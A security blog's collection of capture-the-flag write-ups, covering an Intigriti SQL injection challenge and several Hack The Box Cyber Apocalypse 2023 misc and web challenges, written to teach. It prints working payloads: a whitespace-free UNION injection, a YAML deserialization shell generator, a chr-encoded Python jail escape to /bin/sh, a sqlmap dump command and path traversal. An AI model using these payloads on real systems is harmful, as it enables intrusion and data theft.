Lê Hoàng | BKISC Blogs

Writeup for Intigriti September Challenge 2023

Tue, 26 Sep 2023 00:00:00 +0000

Table of Contents

Hi all, first time doing a writeup here 😉. This will be the Intigriti September 2023 challenge created by @sgrum0x. I wrote this writeup not just for experienced players but also for newbies. In short, this challenge can be solved by using parentheses for whitespaces filter and get a column without using its name.

Statement

Featuring this month’s challenge will be an SQL injection challenge. At first glance, it is a table containing ID, username, email of some users.

There is also a Show Source button. Upon clicking it, we can have a look at the source code of the challenge.

 1...
 2$max = 10;
 3
 4if (isset($_GET['max']) && !is_array($_GET['max']) && $_GET['max']>0) {
 5 $max = $_GET['max'];
 6 $words = ["'","\"",";","`"," ","a","b","h","k","p","v","x","or","if","case","in","between","join","json","set","=","|","&","%","+","-","<",">","#","/","\r","\n","\t","\v","\f"]; // list of characters to check
 7 foreach ($words as $w) {
 8 if (preg_match("#".preg_quote($w)."#i", $max)) {
 9 exit("H4ckerzzzz");
10 } //no weird chars
11 }
12}
13
14try{
15 //seen in production
16 $stmt = $pdo->prepare("SELECT id, name, email FROM users WHERE id<=$max");
17 $stmt->execute();
18 $results = $stmt->fetchAll();
19}
20catch(\PDOException $e){
21 exit("ERROR: BROKEN QUERY");
22}
23 /* FYI
24 CREATE TABLE users (
25 id INT AUTO_INCREMENT PRIMARY KEY,
26 name VARCHAR(255) NOT NULL,
27 email VARCHAR(255) UNIQUE NOT NULL,
28 password VARCHAR(255) NOT NULL
29 );
30 */
31?>
32...
33<td><?= htmlspecialchars(strpos($row['id'],"INTIGRITI")===false?$row['id']:"REDACTED"); ?></td>
34<td><?= htmlspecialchars(strpos($row['name'],"INTIGRITI")===false?$row['name']:"REDACTED"); ?></td>
35<td><?= htmlspecialchars(strpos($row['email'],"INTIGRITI")===false?$row['email']:"REDACTED"); ?></td>
36...

Upon reading the source code, I was able to guess that the flag will be in the column password which we need to leak it somehow using `SQL Injection``. So where is the injection point? What are the problems that we need to encounter? Let’s dive deeper.

Overview

First glance

Upon reviewing the source code, we can easily find the SQL Injection endpoint.

1$max = 10;
2...
3$max = $_GET['max'];
4...
5$stmt = $pdo->prepare("SELECT id, name, email FROM users WHERE id<=$max");

But it wouldn’t have been a challenge if it was this easy right 🥲? The variable $max must go through a god d@mn filter to be passed to the query.

Filter

Let’s take a look at the filter:

1if (isset($_GET['max']) && !is_array($_GET['max']) && $_GET['max']>0) {
2 $max = $_GET['max'];
3 $words = ["'","\"",";","`"," ","a","b","h","k","p","v","x","or","if","case","in","between","join","json","set","=","|","&","%","+","-","<",">","#","/","\r","\n","\t","\v","\f"]; // list of characters to check
4 foreach ($words as $w) {
5 if (preg_match("#".preg_quote($w)."#i", $max)) {
6 exit("H4ckerzzzz");
7 } //no weird chars
8 }
9}

In short, there are 2 processes the filter performs:

First, it checks the query $_GET['max'] if it is an array and greater than 0.
If it satisfies the condition, it assigns $max with the query $_GET['max'], and then it performs a blacklist case insensitive check.

Filter bypass

Number Check

First up, in order to get through the if statement, the max must greater than 0. This is easy as stated in PHP Documentation.

So we only need a number > 0 at the first character of the payload, we’re good to move on.

No whitespaces

Any payloads that contain white space or newline characters are filtered.

Comments for whitespaces will fail as it blocks character /.

There are a few payloads with alternative characters, unicodes that I have tried and failed like: %a0, %09, %0a, ...

There are still other ways.

Taking this from Hacktricks, we may already find the payload we need: ?max=(1)and(1)=(1).

Nice👌.

However, if you apply this right away it would not work as it requires a leading numeric character in the payload. We can use arithmetic operators to utilize this.

Operator * multiply is not filtered. ?max=1*(2)and(1)=(1)

Desired characters are blocked

We can already construct a payload for Union-Based SQL Injection.

The payload for it may be: 1 union select 1,2,password from users

Bad news: "password" has character a “a” which is filtered.

Good news: Hacktricks also offers us another way around.

-- This is an example with 3 columns that will extract the column number 3
-1 UNION SELECT 0, 0, 0, F.3 FROM (SELECT 1, 2, 3 UNION SELECT * FROM demo)F;

Constructing payload

Our union select

Let’s start with making our union select, provided that there are no filters applied.

It would be:

1*2 UNION SELECT 1, 2, password FROM users

Without using a column name

Column "password" is the fourth column of the table users. So the payload from the previous section would be:

1*2 UNION SELECT 1, 2, F.4 FROM (SELECT 1, 2, 3, 4 UNION SELECT * FROM users)F
-- Extracting the fourth column with a table with 4 columns

Combine with no spaces using parentheses

This is a tedious and annoying part to explain so I just leave it right here for you to think about and try:

1*(2)union(SELECT(1),(2),((F.4))from(SELECT(1),(2),(3),(4)union(SELECT*from(users)))F)

Try it out

The payload seems to work pretty well, but the flag should be there right? Unfortunately, no.

The problem is right here:

1<td><?= htmlspecialchars(strpos($row['id'],"INTIGRITI")===false?$row['id']:"REDACTED"); ?></td>
2<td><?= htmlspecialchars(strpos($row['name'],"INTIGRITI")===false?$row['name']:"REDACTED"); ?></td>
3<td><?= htmlspecialchars(strpos($row['email'],"INTIGRITI")===false?$row['email']:"REDACTED"); ?></td>

If our result contains "INTIGRITI" (which is the flag) it will return "REDACTED". 🛐

Final touch

We need to find a function, a string function to be precise, that can make the string contain the word "INTIGRITI" no more.

A few come to mind like: SUBSTR, REVERSE, FORMAT, … but they are all filtered this way or another.

And there’s MID instead of SUBSTR … Wow. Just wow. So to not return the result containing "INTIGRITI", we can use MID(str,2) which skips the first character.

One more thing: You may use LOWER and it still got through and the flag is still correct in this challenge.

Put it all together

OUR final payload after using MID will be:

1*(2)union(SELECT(1),(2),((MID(F.4,2)))from(SELECT(1),(2),(3),(4)union(SELECT*from(users)))F)

Conclusion

Overall, the challenge is quite interesting from my perspective. At first glance, the blacklist may be overwhelming for those who are not familiar with solving CTF challenges. However, with a little bit of searching and trying, failing in the process is a must, the challenge may seem not so tough after all.

Thanks for reading and have a nice day.

P/S: There is a similar challenge on Root-me, check it out

Cyber Apocalypse 2023: The Cursed Mission - Miscellaneous

Mon, 27 Mar 2023 00:00:00 +0000

Table of Contents

Persistence

Description: Thousands of years ago, sending a GET request to /flag would grant immense power and wisdom. Now it’s broken and usually returns random data, but keep trying, and you might get lucky… Legends say it works once every 1000 tries.
Note: This challenge had a docker but it might be closed at the time you are reading this. All needed files will be given in the write-ups.
Category: Miscellaneous
Difficulty: Very Easy

We are given a website to work with. Initially, connection to the website would result in “404 Not Found”. I then went to read the descriptions, and from it, I got to know that we should send at least 1000 GET requests to /flag to maybe get the flag.

I used this below Python script to automate the task.

import requests

url = "http://64.227.41.83:30380/flag"
for i in range(10000):
 response = requests.get(url)
 content = response.content
 if b'HTB{' in content:
 print(content)
 break

After a short wait, we got the flag.

Flag is: HTB{y0u_h4v3_p0w3rfuL_sCr1pt1ng_ab1lit13S!}

Hijack

Description: The security of the alien spacecrafts did not prove very robust, and you have gained access to an interface allowing you to upload a new configuration to their ship’s Thermal Control System. Can you take advantage of the situation without raising any suspicion?
Note: This challenge had a docker but it might be closed at the time you are reading this. All needed files will be given in the write-ups.
Category: Miscellaneous
Difficulty: Easy

Let’s try to connect to the challenge instance.

And let’s try to test out those options.

ISFweXRob24vb2JqZWN0Ol9fbWFpbl9fLkNvbmZpZyB7SVJfc3BlY3Ryb21ldGVyX3RlbXA6ICcxNScsIGF1dG9fY2FsaWJyYXRpb246ICdvbicsCiAgcHJvcHVsc2lvbl90ZW1wOiAnMzQzNCcsIHNvbGFyX2FycmF5X3RlbXA6ICcxMicsIHVuaXRzOiBmfQo=

The function in question generates a base64 encoded string representing a serialized object. To provide some context, serialization is the process of storing an object, such as an array or class, in a database for later retrieval. When the application needs to access the object, it unserializes it, or loads it from the database using a function. This can improve the efficiency of Object-Oriented Programming.

It is important to note, however, that serialized objects should not be vulnerable to manipulation by users. If a user creates a malicious object, it could execute unwanted code. This challenge illustrates this point by presenting us with a serialized object and its corresponding base64 encoding. This is just one example of how serialized objects can be used, and it is essential to be aware of their potential risks.

Let’s take a look at the next options. The application is requesting a base64 encoded string of a serialized object.

Upon examining the serialized object provided by the application, I have determined that it is a YAML-formatted Python serialized object. This article serves as an excellent illustration of how attackers can leverage YAML-based exploits to execute arbitrary code.

Here is the script to generate a serialized object.

import yaml
import os
import base64
class Test(object):
 def __reduce__(self):
 return (os.system, ('sh',))
serialized_data = yaml.dump(Test()) # serializing data
print(base64.b64encode(serialized_data.encode()).decode())

Let’s grab the result and throw it to the application.

Flag is: HTB{1s_1t_ju5t_m3_0r_iS_1t_g3tTing_h0t_1n_h3r3?}

Restricted

Given file: Get it here!
Description: You ’re still trying to collect information for your research on the alien relic. Scientists contained the memories of ancient egyptian mummies into small chips, where they could store and replay them at will. Many of these mummies were part of the battle against the aliens and you suspect their memories may reveal hints to the location of the relic and the underground vessels. You managed to get your hands on one of these chips but after you connected to it, any attempt to access its internal data proved futile. The software containing all these memories seems to be running on a restricted environment which limits your access. Can you find a way to escape the restricted environment?
Note: This challenge had a docker but it might be closed at the time you are reading this. All needed files will be given in the write-ups.
Category: Miscellaneous
Difficulty: Easy

We are provided with a server and it’s source. From the source, we know that it is a SSH server.

One thing particular about this server is that, if the username is restricted, we will not need to provide a password to authenticate, but the user will be in restricted shell mode.

To cope with this, we can use a trick called SSH self loop-back, which means we initiate a SSH connection inside a SSH, since restricted shell doesn’t prevent us from using SSH commands.

First, we connect to the SSH server using the username restricted.

From the source, we also know that the exposed port is 1337. Then, we can use SSH self loop-back to have the permission to use cat, since we also know that flag.txt is changed to flag_* (with * represents some random bytes) and lies in plainsight.

Flag is: HTB{r35tr1ct10n5_4r3_p0w3r1355}

Remote computation

Description: The alien species use remote machines for all their computation needs. Pandora managed to hack into one, but broke its functionality in the process. Incoming computation requests need to be calculated and answered rapidly, in order to not alarm the aliens and ultimately pivot to other parts of their network. Not all requests are valid though, and appropriate error messages need to be sent depending on the type of error. Can you buy us some time by correctly responding to the next 500 requests?
Note: This challenge had a docker but it might be closed at the time you are reading this. All needed files will be given in the write-ups.
Category: Miscellaneous
Difficulty: Easy

The program asked us to calculate 500 math expressions with the following conditions.

Results
---
All results are rounded
to 2 digits after the point.
ex. 9.5752 -> 9.58

Error Codes
---
* Divide by 0:
This may be alien technology,
but dividing by zero is still an error!
Expected response: DIV0_ERR

* Syntax Error
Invalid expressions due syntax errors.
ex. 3 +* 4 = ?
Expected response: SYNTAX_ERR

* Memory Error
The remote machine is blazingly fast,
but its architecture cannot represent any result
outside the range -1337.00 <= RESULT <= 1337.00
Expected response: MEM_ERR

At first I tried to round the numbers the mathematical way but then I realised the remote server was using the round() function of python the whole time.

So yeah here’s the solve script.

from decimal import Decimal, ROUND_HALF_UP, ROUND_HALF_DOWN
from pwn import *

io = remote('144.126.196.198', 30843)
print(io.recvuntil(b'>'))
io.sendline(b'1')
print(io.recvuntil(b'...'))
for _ in range(500):
 node = io.recvuntil(b']')
 if b'!' in node:
 log.info("BRUH!!!!!!!!!!!") # In case something goes wrong (and it did)
 break
 print(node)
 io.recv(2)
 equation = io.recvuntil(b'=')[:-1].decode()
 print(equation, end='=')
 print(io.recvuntil(b'>'))
 try:
 cal = eval(equation)
 if cal < -1337 or cal > 1337:
 log.info('MEM_ERR')
 io.sendline(b"MEM_ERR")
 else:
 res = round(cal, 2)
 # if cal >= 0:
 # res = Decimal(str(cal)).quantize(Decimal('1.00'), rounding=ROUND_HALF_UP)
 # else:
 # res = Decimal(str(cal)).quantize(Decimal('1.00'), rounding=ROUND_HALF_DOWN)
 log.info('SUCCESS WITH RESULT: {}'.format(str(res)))
 io.sendline(str(res).encode())
 except SyntaxError:
 log.info('SYNTAX_ERR')
 io.sendline(b"SYNTAX_ERR")
 except ZeroDivisionError:
 log.info('DIV0_ERR')
 io.sendline(b"DIV0_ERR")
io.interactive()

Flag is: HTB{d1v1d3_bY_Z3r0_3rr0r}

Janken

Given file: Get it here!
Description: As you approach an ancient tomb, you’re met with a wise guru who guards its entrance. In order to proceed, he challenges you to a game of Janken, a variation of rock paper scissors with a unique twist. But there’s a catch: you must win 100 rounds in a row to pass. Fail to do so, and you’ll be denied entry.
Note: This challenge had a docker but it might be closed at the time you are reading this. All needed files will be given in the write-ups.
Category: Miscellaneous
Difficulty: Easy

There are 2 noticable functions called within main() which is game() and get_prize().

The get_prize() function simply gives us the flag so we won’t go too deep into it. But in order for this function to be called. We have to win 100 games of rock, paper, scissors. A.K.A. the game() function.

Having analyzed it, we got the following code:

int game()
{
 unsigned int v0; // eax
 size_t i; // [rsp+0h] [rbp-80h]
 __int64 v3; // [rsp+8h] [rbp-78h]
 __int64 v4[4]; // [rsp+10h] [rbp-70h]
 char *needle[4]; // [rsp+30h] [rbp-50h]
 __int64 buf[6]; // [rsp+50h] [rbp-30h] BYREF

 buf[5] = __readfsqword(0x28u);
 v0 = time(0LL);
 srand(v0);
 v3 = rand() % 3;
 v4[0] = (__int64)"rock";
 v4[1] = (__int64)"scissors";
 v4[2] = (__int64)"paper";
 memset(buf, 0, 32);
 needle[0] = "paper";
 needle[1] = "rock";
 needle[2] = "scissors";
 fwrite(&unk_2540, 1uLL, 0x33uLL, stdout);
 read(0, buf, 31uLL);
 fprintf(
 stdout,
 "\n[!] Guru's choice: %s%s%s\n[!] Your choice: %s%s%s",
 "\x1B[1;31m",
 (const char *)v4[v3],
 "\x1B[1;36m",
 "\x1B[1;32m",
 (const char *)buf,
 "\x1B[1;36m");
 for ( i = 0LL; i < strlen((const char *)buf); ++i )
 {
 if ( ((*__ctype_b_loc())[*((char *)buf + i)] & ' \0') != 0 )
 {
 *((_BYTE *)buf + i) = 0;
 break;
 }
 }
 if ( !strstr((const char *)buf, needle[v3]) )
 {
 fprintf(stdout, "%s\n[-] You lost the game..\n\n", "\x1B[1;31m");
 exit(22);
 }
 return fprintf(stdout, "\n%s[+] You won this round! Congrats!\n%s", "\x1B[1;32m", "\x1B[1;36m");
}

We noticed that the program (Guru) chooses a random number from 0 to 2, which is rock, paper, scissors accordingly. It then checks if our input contains the string that can win against its choice using the strstr() function.

In other words, if Guru chooses rock, then if our input contain the string paper, we win.

We can exploit the strstr() by spamming rockpaperscissors 100 times or write a script to do it for us.

from pwn import *

io = remote('68.183.37.122', 32161)
print(io.recv())
io.sendline(b'1')
for _ in range(100):
 print(io.recv())
 io.sendline(b'rockpaperscissors')
io.interactive()

Flag is: HTB{r0ck_p4p3R_5tr5tr_l0g1c_buG}

nehebkaus trap

Description: In search of the ancient relic, you go looking for the Pharaoh’s tomb inside the pyramids. A giant granite block falls and blocks your exit, and the walls start closing in! You are trapped. Can you make it out alive and continue your quest?
Note: This challenge had a docker but it might be closed at the time you are reading this. All needed files will be given in the write-ups.
Category: Miscellaneous
Difficulty: Medium

A classic pyjail challenge with no source code. It filtered out some special characters like ' " _ . / so we couldn’t directly execute any code.

One way to bypass this is to break down the string of code we want to execute into individual characters and concatenate them together using the + operator.

We can bypass the ' and " filter simply by using chr(hex-value-of-the-ascii-character) to make the character we want.

For this I used eval("__import__('os').system('/bin/sh')"). The payload for this is:

eval(chr(0x5f)+chr(0x5f)+chr(0x69)+chr(0x6d)+chr(0x70)+chr(0x6f)+chr(0x72)+chr(0x74)+chr(0x5f)+chr(0x5f)+chr(0x28)+chr(0x27)+chr(0x6f)+chr(0x73)+chr(0x27)+chr(0x29)+chr(0x2e)+chr(0x73)+chr(0x79)+chr(0x73)+chr(0x74)+chr(0x65)+chr(0x6d)+chr(0x28)+chr(0x27)+chr(0x2f)+chr(0x62)+chr(0x69)+chr(0x6e)+chr(0x2f)+chr(0x73)+chr(0x68)+chr(0x27)+chr(0x29))

Now with all the pieces together, let’s send our exploit.

Flag is: HTB{y0u_d3f34t3d_th3_sn4k3_g0d!}

The Chasm’s Crossing Conundrum

Description: As you and your trusty team of local pyramid experts stand at the precipice of the chasm, you catch a glimpse of the otherworldly relic glowing tantalizingly in the distance. But the final obstacle looms ahead - a narrow, unstable bridge that threatens to send you all tumbling into the depths below. It won’t hold all of you at once. Time is running out, and the charge on your flashlight is dwindling. The chasm seems to be closing in, as if it’s trying to swallow you whole. With each step, you feel the weight of the task at hand. The fate of your team, and perhaps even the world, rests on your shoulders. Can you summon the courage and skill to make it across in time, and claim the relic that lies just beyond your grasp?
Note: This challenge had a docker but it might be closed at the time you are reading this. All needed files will be given in the write-ups.
Category: Miscellaneous
Difficulty: Hard

Classic bridge and torch problem. Here’s the instruction of the game.

☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠
☠ ☠
☠ [*] The path ahead is treacherous. ☠
☠ [*] You have to find a viable strategy to get everyone across safely. ☠
☠ [*] The bridge can hold a maximum of two persons. ☠
☠ [*] The chasm lurks on either side of the bridge waiting for those ☠
☠ who think they can get across in total darkness. ☠
☠ [*] If two persons get across, one must come back with the flashlight. ☠
☠ [*] The flashlight has energy only for a limited amount of time. ☠
☠ [*] The time required for two persons to cross, is dictated by the slower. ☠
☠ [*] The answer must be given in crossing and returning pairs. For example, ☠
☠ [1,2],[2],... . This means that persons 1 and 2 cross and 2 gets back ☠
☠ with the flashlight so others can cross. ☠
☠ ☠
☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠

There’s only one optimal solution for every number of people. You can find it everywhere on the internet so I won’t write it here.

One thing I noticed that the program only has 3 cases which is 6, 7 or 8 people. So instead of writing the general solution, I solved each cases individually.

Here’s the script.

from pwn import *

# take second element for sort
def takeSecond(elem):
 return elem[1]

def man8(elem):
 res = f'[{elem[0][0]},{elem[1][0]}],[{elem[0][0]}],[{elem[6][0]},{elem[7][0]}],[{elem[1][0]}],'
 res += f'[{elem[0][0]},{elem[1][0]}],[{elem[0][0]}],[{elem[4][0]},{elem[5][0]}],[{elem[1][0]}],'
 res += f'[{elem[0][0]},{elem[1][0]}],[{elem[0][0]}],[{elem[2][0]},{elem[3][0]}],[{elem[1][0]}],'
 res += f'[{elem[0][0]},{elem[1][0]}]'
 return res.encode()

def man6(elem):
 res = f'[{elem[0][0]},{elem[1][0]}],[{elem[0][0]}],[{elem[4][0]},{elem[5][0]}],[{elem[1][0]}],'
 res += f'[{elem[0][0]},{elem[1][0]}],[{elem[0][0]}],[{elem[2][0]},{elem[3][0]}],[{elem[1][0]}],'
 res += f'[{elem[0][0]},{elem[1][0]}]'
 return res.encode()

def man7(elem):
 res = f'[{elem[0][0]},{elem[1][0]}],[{elem[0][0]}],[{elem[5][0]},{elem[6][0]}],[{elem[1][0]}],'
 res += f'[{elem[0][0]},{elem[1][0]}],[{elem[0][0]}],[{elem[3][0]},{elem[4][0]}],[{elem[1][0]}],'
 res += f'[{elem[0][0]},{elem[1][0]}],[{elem[0][0]}],[{elem[0][0]},{elem[2][0]}]'
 return res.encode()

# list
person = []

io = remote('68.183.37.122', 31392)
io.recvuntil(b'> ')
io.sendline(b'2')
io.recvuntil(b'flashlight.\n\n')
while(1):
 per = io.recvline(keepends=False)
 if b'flashlight' in per:
 break
 per = per.decode().split()
 person.append((int(per[1]), int(per[4])))
person.sort(key=takeSecond)
if len(person)==8:
 ret = man8(person)
elif len(person)==7:
 ret = man7(person)
else:
 ret = man6(person)
print(ret)
io.recvuntil(b'> ')
io.sendline(ret)
io.interactive()

Flag is: HTB{4cro55_th3_br1dg3_4nd_th3_ch4sm_l13s_th3_tr34sur3}

Original Posts

From FazeCT

Cyber Apocalypse 2023: The Cursed Mission - Web Exploitation

Mon, 27 Mar 2023 00:00:00 +0000

Table of Contents

Introduction

Welcome to our blog post about the web challenges in the HTB Cyber Apocalypse 2023 competition! For those who may not be familiar, HTB (Hack The Box) is a platform that provides a range of cybersecurity challenges for users to test and improve their skills. Cyber Apocalypse 2023 was a massive virtual event that took place in February 2023, where thousands of participants from all over the world competed in a range of challenges, including web, crypto, reverse engineering, and more.

We were able to reach 29th place and solve 60/74 challenges. Particularly for web challenges, we got 8/9 (the one we didn’t solve was Unearthly Shop).

In this blog post, we will focus specifically on the web challenges in the Cyber Apocalypse 2023 competition. We will provide a detailed analysis of each challenge, along with our thought process and the techniques we used to solve them. Whether you’re an aspiring cybersecurity professional or a seasoned veteran, we hope you find our write-ups informative and helpful!

Trapped Source

Description: Intergalactic Ministry of Spies tested Pandora’s movement and intelligence abilities. She found herself locked in a room with no apparent means of escape. Her task was to unlock the door and make her way out. Can you help her in opening the door?
Note: This challenge had a docker but it might be closed at the time you are reading this. All needed files will be given in the write-ups.
Category: Web Exploitation
Difficulty: Very Easy

We are given a website that looks like it requires us to input the right password on a locker to process.

View page source to see if anything is given, and we can see the correct pin is 8291.

Input the correct pin and we get the flag for the challenge.

Flag is: HTB{V13w_50urc3_c4n_b3_u53ful!!!}

Gunhead

Given file:: Get it here
Description: During Pandora’s training, the Gunhead AI combat robot had been tampered with and was now malfunctioning, causing it to become uncontrollable. With the situation escalating rapidly, Pandora used her hacking skills to infiltrate the managing system of Gunhead and urgently needs to take it down.
Note: This challenge had a docker but it might be closed at the time you are reading this. All needed files will be given in the write-ups.
Category: Web Exploitation
Difficulty: Very Easy

Click the URL of the generated challenge server, we are greeted with the home page of the challenge - a pseudo management system page

There are 3 buttons on the right side of the info panel, we interest in the third one, which gives us the shell UI.

Type /help as instructed, the shell command returns the list of possible commands. We saw the ping command, which is familiar one for command injection challenges.

Open the website in Burp Suite monitored browsers, open the shell and type in the command /ping 127.0.0.1, and we see in Burp Suite HTTP history has a POST request to /api/ping

Turn to the challenge source code, at index.php, the /api/ping route is handled the method ping of class ReconController

ReconController.ping() will create instance of ReconModel and its getOutput() method, which will pass the user-controlled ip parameters to the ping command but without any command injection filters, means this is an easy command injection chals

Escape the ping command with the command separator ;, cat the flag, which is stored at /flag.txt in docker container

Flag is: HTB{4lw4y5_54n1t1z3_u53r_1nput!!!}

Drobots

Given file: Get it here!
Description: Pandora’s latest mission as part of her reconnaissance training is to infiltrate the Drobots firm that was suspected of engaging in illegal activities. Can you help pandora with this task?
Note: This challenge had a docker but it might be closed at the time you are reading this. All needed files will be given in the write-ups.
Category: Web Exploitation
Difficulty: Very Easy

We are given a website and a zip file containing the website’s source.

After a quick analyze on the source, I get to understand that either we have to use SQL Injection or use a specific parameter to get to the next page.

Input admin for the username and " OR 1 = 1 – - for the password, or add /home to the URL will grant you access to the next page, which turns out to also contain the flag.

Flag is: HTB{p4r4m3t3r1z4t10n_1s_1mp0rt4nt!!!}

Passman

Given file: Get it here
Description: Pandora discovered the presence of a mole within the ministry. To proceed with caution, she must obtain the master control password for the ministry, which is stored in a password manager. Can you hack into the password manager?
Note: This challenge had a docker but it might be closed at the time you are reading this. All needed files will be given in the write-ups.
Category: Web Exploitation
Difficulty: Easy

The challenge starts with a login screen.

Looking at entrypoint.sh in sources, it appears that an admin account is existed, but the password was random generated so we may have to find someway to get access to admin account later on to finish the challnege.

First create normal account then login. After login success, we are greeted with the dashboard home

Click on the plus button, a form to store credential for online website appears. Fill and submit the form, a new item was created.

Switch to Burp Suite HTTP History panels to look for intersting requests.

It seems that the website uses single POST /graphql endpoint with the JSON body contain query field to dictate the server response.

It’s time to get back to the source for more clues. Here the /graphql endpoint will be handled by a GraphQlSchema defined in helpers/GraphqlHelper.js

In the GraphQLObjectType object mutationType, there is an interesting field UpdatePassword

The UpdatePassword graphql handler receive username and password, it just checks whether the user is authenticated then just ouright runs the update password to any usernames it receives without checking whether the current user is the same as user that is gonna haved his/her password changes, some resource authorization problems here.

Open BurpSuite, send the request POST /graphql to repeater, edit the JSON body to use UpdatePassword graphql handler.

The admin password is updated successfully. Now login as admin.

The flag contents said it was IDOR vulnerabilities, which is actually an incorrect authorization related problem.

Flag is: HTB{1d0r5_4r3_s1mpl3_4nd_1mp4ctful!!}

Orbital

Given file:: Get it here
Description: In order to decipher the alien communication that held the key to their location, she needed access to a decoder with advanced capabilities - a decoder that only The Orbital firm possessed. Can you get your hands on the decoder?
Note: This challenge had a docker but it might be closed at the time you are reading this. All needed files will be given in the write-ups.
Category: Web Exploitation
Difficulty: Easy

At first, we were given the login page which requires credentials. There’s nothing else you can do at this point than reading given code.

Upon given the code, you can find out that there is 1 user “admin” which is initiated at the time the docker is created. We can also see that, the application only has SELECT privilege on table orbital.users and orbital.communications.

mysql -u root << EOF
CREATE DATABASE orbital;
CREATE TABLE orbital.users (
 id INTEGER PRIMARY KEY AUTO_INCREMENT,
 username varchar(255) NOT NULL UNIQUE,
 password varchar(255) NOT NULL
);
CREATE TABLE orbital.communication (
 id INTEGER PRIMARY KEY AUTO_INCREMENT,
 source varchar(255) NOT NULL,
 destination varchar(255) NOT NULL,
 name varchar(255) NOT NULL,
 downloadable varchar(255) NOT NULL
);
INSERT INTO orbital.users (username, password) VALUES ('admin', '$(genPass)');
INSERT INTO orbital.communication (source, destination, name, downloadable) VALUES ('Titan', 'Arcturus', 'Ice World Calling Red Giant', 'communication.mp3');
INSERT INTO orbital.communication (source, destination, name, downloadable) VALUES ('Andromeda', 'Vega', 'Spiral Arm Salutations', 'communication.mp3');
INSERT INTO orbital.communication (source, destination, name, downloadable) VALUES ('Proxima Centauri', 'Trappist-1', 'Lone Star Linkup', 'communication.mp3');
INSERT INTO orbital.communication (source, destination, name, downloadable) VALUES ('TRAPPIST-1h', 'Kepler-438b', 'Small World Symposium', 'communication.mp3');
INSERT INTO orbital.communication (source, destination, name, downloadable) VALUES ('Winky', 'Boop', 'Jelly World Japes', 'communication.mp3');
CREATE USER 'user'@'localhost' IDENTIFIED BY 'M@k3l@R!d3s$';
GRANT SELECT ON orbital.users TO 'user'@'localhost';
GRANT SELECT ON orbital.communication TO 'user'@'localhost';
FLUSH PRIVILEGES;
EOF

Now let’s move on with the application. At first glance at source code, we can see it is vulnerable to Local File Inclusion attack at this endpoint blueprints/routes.py.

from flask import Blueprint, render_template, request, session, redirect, send_file
from application.database import login, getCommunication
from application.util import response, isAuthenticated

web = Blueprint('web', __name__)
api = Blueprint('api', __name__)

@web.route('/')
def signIn():
 return render_template('login.html')

@web.route('/logout')
def logout():
 session['auth'] = None
 return redirect('/')

@web.route('/home')
@isAuthenticated
def home():
 allCommunication = getCommunication()
 return render_template('home.html', allCommunication=allCommunication)

@api.route('/login', methods=['POST'])
def apiLogin():
 if not request.is_json:
 return response('Invalid JSON!'), 400

 data = request.get_json()
 username = data.get('username', '')
 password = data.get('password', '')

 if not username or not password:
 return response('All fields are required!'), 401

 user = login(username, password)

 if user:
 session['auth'] = user
 return response('Success'), 200

 return response('Invalid credentials!'), 403

@api.route('/export', methods=['POST'])
@isAuthenticated
def exportFile():
 if not request.is_json:
 return response('Invalid JSON!'), 400

 data = request.get_json()
 communicationName = data.get('name', '')

 try:
 # Everyone is saying I should escape specific characters in the filename. I don't know why.
 return send_file(f'/communications/{communicationName}', as_attachment=True)
 except:
 return response('Unable to retrieve the communication'), 400

Here we can see when we call /api/export with POST method it will use body parameter name to get the files. We can exploit this to get the flag using something like name=../../../../flag.txt. But to use this endpoint, we must be authenticated, at the context of this challenge only “admin” user can be authenticated.

Looking at how authentication works, I found out a place that is vulnerable to SQL Injection. However keep in mind that we are only granted access to SELECT on table users and communications. I decided to use sqlmap to save the what’re left of my brain cells.

def login(username, password):
 # I don't think it's not possible to bypass login because I'm verifying the password later.
 user = query(f'SELECT username, password FROM users WHERE username = "{username}"', one=True)

 if user:
 passwordCheck = passwordVerify(user['password'], password)

 if passwordCheck:
 token = createJWT(user['username'])
 return token
 else:
 return False

I decided to use Burpsuite to capture to login request, modified the field username with value * and saved it for the usage of sqlmap.

I saved it as req.txt. Since the database and the table was already known the command I used was:

sqlmap -r req.txt --level=5 --risk=3 --technique=T -o --ignore-code 401 -D orbital -T users --dump

Nice but we only got the hash. Initially, I was trying to use hashcat but since this is HackTheBox, the challenge may use well-known hash so I throwed it on the internet and Voila! The credential is admin:ichliebedich, login and use LFI attack the get flag.

Flag is: HTB{T1m3_b4$3d_$ql1_4r3_fun!!!}

Didactic Octo Paddles

Given File: Get it here
Description: You have been hired by the Intergalactic Ministry of Spies to retrieve a powerful relic that is believed to be hidden within the small paddle shop, by the river. You must hack into the paddle shop’s system to obtain information on the relic’s location. Your ultimate challenge is to shut down the parasitic alien vessels and save humanity from certain destruction by retrieving the relic hidden within the Didactic Octo Paddles shop.
Note: This challenge had a docker but it might be closed at the time you are reading this. All needed files will be given in the write-ups.
Category: Web Exploitation
Difficulty: Medium

This time it gives us a login panel like the last time. Except this time it also has register function. Let’s look at the main routes in the source code.

challenge/routes/index.js

module.exports = (db) => {
 const bcrypt = require("bcryptjs");
 const router = require("express").Router();
 const jwt = require("jsonwebtoken");
 const jsrender = require("jsrender");
 const AuthMiddleware = require("../middleware/AuthMiddleware");
 const AdminMiddleware = require("../middleware/AdminMiddleware");
 const { tokenKey, getUserId } = require("../utils/authorization");

 const response = (data) => ({ message: data });

 router.get("/", AuthMiddleware, async (req, res) => {
 try {
 const products = await db.Products.findAll();
 res.render("index", { products: products });
 } catch (error) {
 console.error(error);
 res.status(500).send("Something went wrong!");
 }
 });

 ........

 router.post("/register", async (req, res) => {
 try {
 const username = req.body.username;
 const password = req.body.password;

 if (!username || !password) {
 return res
 .status(400)
 .send(response("Username and password are required"));
 }

 const existingUser = await db.Users.findOne({
 where: { username: username },
 });
 if (existingUser) {
 return res
 .status(400)
 .send(response("Username already exists"));
 }

 await db.Users.create({
 username: username,
 password: bcrypt.hashSync(password),
 }).then(() => {
 res.send(response("User registered succesfully"));
 });
 } catch (error) {
 console.error(error);
 res.status(500).send({
 error: "Something went wrong!",
 });
 }
 });

 ........

 router.post("/login", async (req, res) => {
 try {
 const username = req.body.username;
 const password = req.body.password;

 if (!username || !password) {
 return res
 .status(400)
 .send(response("Username and password are required"));
 }

 const user = await db.Users.findOne({
 where: { username: username },
 });
